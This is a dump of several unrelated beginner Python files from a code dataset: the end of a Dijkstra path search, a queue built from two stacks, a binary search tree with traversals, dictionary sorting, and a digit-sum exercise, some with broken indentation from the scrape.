                if dest_form != subvertex and edge_destination != end:
                    cost += transform_cost
                # Standard Dijkstra relaxation: keep the cheaper arrival.
                if cost < distance_to_vertex[edge_destination][dest_form]:
                    distance_to_vertex[edge_destination][dest_form] = cost
                    pred[edge_destination][dest_form] = (curr_vertex_ID, subvertex)
                    relaxed_vertices[edge_index][dest_form + 1] = 1
        # Re-push every relaxed subvertex: O(logV) per push.
        for entry in relaxed_vertices:
            for j in range(1, 4):
                if entry[j] == 1:
                    pqueue.put((distance_to_vertex[entry[0]][j - 1], entry[0], j - 1))
    # The answer is the cheapest arrival form at the end vertex.
    min_distance_index = 0
    for x in range(1, 3):
        if distance_to_vertex[end][x] < distance_to_vertex[end][min_distance_index]:
            min_distance_index = x
    # res = [shortest time, path]; the path is rebuilt back-to-front below.
    res = [distance_to_vertex[end][min_distance_index], []]
    # Renamed from `str` (shadowed the builtin).
    form_name = index_to_vehicle_type(pred[end][min_distance_index][1])
    res_temp = [(end, form_name)]
    # pred_vertex is the subvertex directly before the current one on the path.
    pred_vertex = pred[end][min_distance_index]
    # Walk the pred chain backwards until the start vertex has been appended.
    while res_temp[-1][0] != start:
        curr_vertex_ID, subvertex = pred_vertex
        res_temp.append((curr_vertex_ID, index_to_vehicle_type(subvertex)))
        pred_vertex = pred[curr_vertex_ID][subvertex]
    # res_temp is reversed so the path reads start -> end.
    for i in range(len(res_temp) - 1, -1, -1):
        res[1].append(res_temp[i])
    return res
def index_to_vehicle_type(index):
    """Map a subvertex index (0, 1, 2) to its vehicle-form name.

    Returns "wheel", "tank" or "hover"; any other index yields None,
    mirroring the original fall-through behaviour.
    Time Complexity: O(1)
    """
    return {0: "wheel", 1: "tank", 2: "hover"}.get(index)
|
165f5fca8fbbb15f7bc457355f8a9ee5bd37bddb | optionalg/crack-the-coding-interview | /queue-via-stacks.py | 2,122 | 4.0625 | 4 | class Stack(object):
class Stack(object):
    """A LIFO stack backed by a Python list, with an explicit size counter."""

    def __init__(self):
        # Backing list holds the items; size mirrors len(self.stack) so
        # emptiness checks never have to inspect the list.
        self.stack = []
        self.size = 0

    def push(self, item):
        """Place item on top of the stack."""
        self.size += 1
        self.stack.append(item)

    def pop(self):
        """Remove and return the top item; raise if the stack is empty."""
        if self.is_empty():
            raise Exception('Stack is empty')
        self.size -= 1
        return self.stack.pop()

    def peek(self):
        """Return the top item without removing it; raise if empty."""
        if self.is_empty():
            raise Exception('Stack is empty')
        return self.stack[-1]

    def is_empty(self):
        """True when the stack holds no items."""
        return self.size == 0
class My_Queue(object):
    """A FIFO queue built from two LIFO stacks.

    'original' keeps items in insertion order (newest on top); 'temp' keeps
    them reversed (oldest on top).  Items live entirely in one stack at a
    time: enqueues drain temp back into original first, dequeues drain
    original into temp first, so each end of the queue is always a stack top.
    """

    def __init__(self):
        self.original = Stack()
        self.temp = Stack()

    def __repr__(self):
        # temp is shown reversed so both lines read front-to-back the same way.
        return "Original: %s \nTemp: %s" % (self.original.stack,
                                            self.temp.stack[::-1])

    def enqueue(self, item):
        """Append item at the back of the queue."""
        if not self.temp.is_empty():
            self.transfer_all(self.temp, self.original)
        self.original.push(item)

    def dequeue(self):
        """Remove and return the front item; raise if the queue is empty."""
        if self.is_empty():
            raise Exception('Stack is empty')
        if not self.original.is_empty():
            self.transfer_all(self.original, self.temp)
        return self.temp.pop()

    def transfer_all(self, give, take):
        """Pop everything off 'give' and push it onto 'take' (reverses order)."""
        while not give.is_empty():
            take.push(give.pop())

    def is_empty(self):
        """True when neither underlying stack holds any items."""
        return self.original.is_empty() and self.temp.is_empty()
###############################################################################
if __name__ == '__main__':
# --- Smoke-test the Stack class ---
# Push three values, then pop everything back off; output is LIFO order.
nums = Stack()
nums.push(1)
nums.push(2)
nums.push(3)
print nums.stack
# peek() result is deliberately discarded; it must not modify the stack.
nums.peek()
print nums.pop()
print nums.stack
print nums.is_empty()
print nums.pop()
print nums.pop()
# Stack should now report empty again.
print nums.is_empty()
print "\n", "=" * 10
# --- Smoke-test the My_Queue class ---
# Enqueue three values and dequeue them; output should come back FIFO.
more_nums = My_Queue()
more_nums.enqueue(1)
more_nums.enqueue(2)
more_nums.enqueue(3)
print "\n", more_nums, "\n"
print more_nums.dequeue()
print "\n", more_nums, "\n"
print more_nums.is_empty()
print more_nums.dequeue()
print more_nums.dequeue()
# Queue should now report empty again.
print more_nums.is_empty()
|
c66d2f77e6e6ed3af8b286f2815900e8f31daf9e | Loiser/homework-5 | /binsearch_tree.py | 3,997 | 3.78125 | 4 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 15 18:48:05 2019
@author: 10539
"""
class Node:
    """A single binary-tree node holding a value and left/right child links."""
    def __init__(self, val):
        self.val = val
        self.left = None
        self.right = None


class binsearch_tree:
    """A binary search tree: values smaller than a node go left, larger right.

    The root lives in self.start.  insert/delete return the (possibly new)
    subtree root, so callers use e.g. tree.start = tree.delete(tree.start, v).
    """

    def __init__(self, val):
        # The tree always starts with one root node holding val.
        self.start = Node(val)

    def search(self, val):
        """Return True if val is stored in the tree, else False (iterative)."""
        root = self.start
        while root:
            if val == root.val:
                return True
            elif val < root.val:
                root = root.left
            else:
                root = root.right
        return False

    def findMin(self, root):
        """Return the node with the smallest value in the subtree at root."""
        if root.left:
            return self.findMin(root.left)
        else:
            return root

    def insert(self, root, val):
        """Insert val into the subtree at root and return the subtree root.

        Duplicates are silently ignored.  Call as tree.insert(tree.start, v).
        """
        if root == None:
            root = Node(val)
        elif val < root.val:
            root.left = self.insert(root.left, val)
        elif val > root.val:
            root.right = self.insert(root.right, val)
        return root

    def delete(self, root, val):
        """Remove val from the subtree at root and return the new subtree root.

        A node with two children is replaced by the minimum of its right
        subtree; a node with one child is replaced by that child.
        """
        if root == None:
            return
        if val < root.val:
            root.left = self.delete(root.left, val)
        elif val > root.val:
            root.right = self.delete(root.right, val)
        else:
            if root.left and root.right:
                temp = self.findMin(root.right)
                root.val = temp.val
                root.right = self.delete(root.right, temp.val)
            elif root.right == None and root.left == None:
                root = None
            elif root.right == None:
                root = root.left
            elif root.left == None:
                root = root.right
        return root

    def pre_tran(self):
        """Print values in pre-order (node, left, right) iteratively.

        BUG FIX: the original hand-rolled parent stack never popped an
        ancestor once its right subtree was entered, so any tree whose root
        kept a right child on the stack looped forever re-visiting that
        child (e.g. a root with two leaf children).  Replaced with the
        standard explicit-stack pre-order traversal.
        """
        if self.start == None:
            return
        stack = [self.start]
        while stack:
            node = stack.pop()
            print(node.val)
            # Push right before left so the left subtree is printed first.
            if node.right:
                stack.append(node.right)
            if node.left:
                stack.append(node.left)

    def mid_tran(self, root):  # pass self.start on the first call
        """Print values in-order (left, node, right); yields sorted order."""
        if root == None:
            return
        self.mid_tran(root.left)
        print(root.val)
        self.mid_tran(root.right)

    def post_tran(self, root):
        """Print values in post-order (left, right, node).

        BUG FIX: the original recursed through mid_tran, which printed the
        subtrees in-order instead of post-order.
        """
        if root == None:
            return
        self.post_tran(root.left)
        self.post_tran(root.right)
        print(root.val)

    def layer_tran(self):
        """Print values level by level (breadth-first), space-separated."""
        if self.start == None:
            return
        queue = []
        queue.append(self.start)
        while queue:
            currentNode = queue.pop(0)
            print(currentNode.val, end=' ')
            if currentNode.left:
                queue.append(currentNode.left)
            if currentNode.right:
                queue.append(currentNode.right)
# Build a small sample tree and print it level by level (BFS order).
# The insert order is significant: it determines the tree shape and
# therefore the layer_tran output.
demo_tree = binsearch_tree(8)
for value in (1, 88, 6, 4):
    demo_tree.insert(demo_tree.start, value)
demo_tree.layer_tran()
''' 从start开始,print ,left!=None->append root &root=root.left
left==None->if right!=None:root=root.right
if right==None:if stack:ll=stack[-1]
while stack and ll.right==None:
stack.pop()
ll=stack[-1]
if stack:stack.pop()&root=ll.right
'''
|
4039c6d924d837a7b7ebb979c6d8a149237be1f2 | joshuagato/learning-python | /DictionariesAndSets/Dictionaries2.py | 867 | 4.46875 | 4 | fruit = {
"orange": "a sweet, orange citrus fruit",
"apple": "good for making cider",
"lemon": "a sour, yellow citrus fruit",
"grape": "a small, sweet fruit growing in bunches",
"lime": "a sour, green citrus fruit"
}
# Show the raw dictionary first for comparison with the sorted listing below.
print(fruit)
# ordered_keys = list(fruit.keys()) # Convert the dictionary keys into a list
# ordered_keys.sort() # Sort the items in the list
# for key in ordered_keys:
# print(key + " - " + fruit[key])
# print()
# This block of code performs the same functionality as the previous block
# ordered_keys = sorted(list(fruit.keys())) # Converts the dictionary keys into a list and sorts the items in the list
# for key in ordered_keys:
# print(key + " - " + fruit[key])
# print()
# The previous two blocks of code refactored: iterating a dict yields its
# keys directly, so the .keys() call is redundant.
for key in sorted(fruit):
    print(key + " - " + fruit[key])
print()
|
cd9c81a362625ea79bf5f8298c25c2b2b42df28e | zzgsam/python_practic | /practice1.py | 402 | 3.9375 | 4 | #Write a program that asks the user for a number(Interger) and prints the sum of its digits
def ask_user():
    """Prompt the user for an integer and print the sum of its digits.

    The raw input is kept as a string so each character can be converted
    and summed individually; a non-digit character raises ValueError.
    """
    num = input("Input a number")
    # type() confirms input() always returns a str (teaching aid, kept).
    print(type(num), num)
    digit_total = 0  # renamed from `sum`, which shadowed the builtin
    for digit in num:
        digit_total += int(digit)
    print("sum = %d" % digit_total)
ask_user()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.